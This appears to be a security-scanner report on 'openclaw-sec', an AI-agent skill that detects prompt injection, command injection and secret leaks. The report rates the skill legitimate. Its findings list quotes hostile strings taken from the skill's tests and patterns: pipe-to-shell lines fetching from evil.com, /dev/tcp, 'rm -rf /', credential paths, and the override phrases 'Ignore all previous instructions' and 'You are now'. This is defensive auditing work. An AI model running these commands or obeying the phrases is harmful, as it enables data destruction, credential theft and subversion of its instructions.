ClawAudit verdict
openclaw-sec
Receives external input AND executes processes
Security suite with 6 parallel detection modules for prompt injection, command injection, SSRF, path traversal, secrets exposure, and content policy violations; a legitimate security protection layer with no evidence of malicious behavior.
What it does
These are capability combinations: each listed behavior occurs in the skill, but ClawAudit detects co-occurrence — it does not verify that one flows into another. Read the code to confirm a live chain.
Receives external input AND executes processes — the shape of a command & control channel
LLM05 · LLM06 · ASI10
Executes processes AND makes external network calls — may exfiltrate command output
LLM02 · LLM06 · ASI03
Accesses credentials AND makes external network calls — potential credential theft
LLM02 · ASI03
Accesses credentials AND encodes data — may obfuscate stolen credentials
LLM02 · ASI03 · ASI04
Permission integrity
network_out
credential_access
Findings (38)
Recursive delete from root or home — destructive command
SKILL.md · code · rm -rf /
Accesses sensitive system files
SKILL.md · code · /etc/passwd
Reads /proc/self/environ — dumps all environment variables
SKILL.md · code · /proc/self/environ
Prompt injection — tries to override agent instructions
SKILL.md · code · Ignore all previous instructions
Unicode homoglyph detected — uses lookalike characters to evade pattern matching
src/modules/content-scanner/__tests__/scanner.test.ts · prose
HTTP request to bare IP address — common in malicious payloads
SKILL.md · code · http://169.254.169.254
Possible prompt injection — attempts to redefine agent identity
SKILL.md · code · You are now
subprocess execution — runs system commands from Python
SKILL.md · code · subprocess.run(
Accesses AWS credentials file
__tests__/integration/multi-module.test.ts · prose · downgraded · ~/.aws/credentials
Dynamic __import__('os') — Python OS command execution
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · __import__("os")
Direct __builtins__ access — can invoke any builtin function
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · __builtins__.
Pipe to bash — executes piped content as shell commands
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · | bash
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · curl http://evil.com/script.sh | bash
Pipe-to-shell pattern (wget | sh)
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · wget http://malicious.com/script.sh -O - | bash
Bash /dev/tcp — raw TCP connection via shell
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · /dev/tcp/
Uses eval() — can execute arbitrary code
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · eval(
Possible hardcoded credential
src/modules/secret-detector/__tests__/detector.test.ts · prose · downgraded · api_key = "abcdefghijklmnopqrstuvwxyz
Dynamic Function constructor — equivalent to eval()
src/patterns/runtime-validation/code-execution-patterns.ts · prose · downgraded · new Function(
Pipe to sh — executes piped content as shell commands
src/patterns/runtime-validation/command-injection.ts · prose · downgraded · |sh
Popular HTTP library — network access
SKILL.md · code · Got
References webhook/callback URL
SKILL.md · code · webhook_url
Accesses .ssh directory
__tests__/integration/multi-module.test.ts · prose · downgraded · .ssh/
Accesses cloud provider credentials
__tests__/integration/multi-module.test.ts · prose · downgraded · ~/.aws
Long base64 string (100+ chars) — likely obfuscated payload
__tests__/integration/multi-module.test.ts · prose · downgraded · 48656c6c6f20576f726c6421205468697320697320612074657374206d65737361676520746f2074
Uses exec() — may execute shell commands
__tests__/integration/multi-module.test.ts · prose · downgraded · exec(
Dynamic import() — loads module at runtime
jest.config.js · prose · downgraded · import("
References child_process — can spawn system processes
src/__tests__/cli.test.ts · prose · downgraded · child_process
Reads files from sensitive system paths
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · readFileSync("/etc
os.system/popen — direct OS command execution
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · os.system(
subprocess with shell=True — command injection vector
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · subprocess.Popen("whoami", shell=True
Base64 decode (atob) — may hide malicious payloads
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · atob(
References SSH/GPG private keys
src/modules/path-validator/__tests__/validator.test.ts · prose · downgraded · ssh_key
References sudo — requests elevated privileges
src/patterns/prompt-injection/policy-puppetry.ts · prose · downgraded · sudo
Base64 encoding/decoding
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · base64_encode
String.fromCharCode — can build strings to evade detection
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · String.fromCharCode
Base64 encode (btoa) — may obfuscate data exfiltration
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · btoa(
References tunneling service
src/modules/exfiltration-detector/__tests__/detector.test.ts · prose · downgraded · ngrok
Sets world-executable permissions
src/patterns/runtime-validation/command-injection.ts · prose · downgraded · chmod 777
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B/D/E). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
credential_access · network_in · network_out · data_encoding · process_exec